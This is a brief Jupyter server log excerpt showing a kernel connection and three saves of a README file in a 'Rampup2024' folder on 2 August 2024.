[I 2024-08-02 21:27:37.278 ServerApp] Connecting to kernel f4b02ff0-99f3-4fe2-a615-3fc19aa9b142.
[I 2024-08-02 21:28:13.867 ServerApp] Saving file at /Rampup2024/README.md
[I 2024-08-02 21:28:16.657 ServerApp] Saving file at /Rampup2024/README.md
[I 2024-08-02 21:28:29.970 ServerApp] Saving file at /Rampup2024/README.md
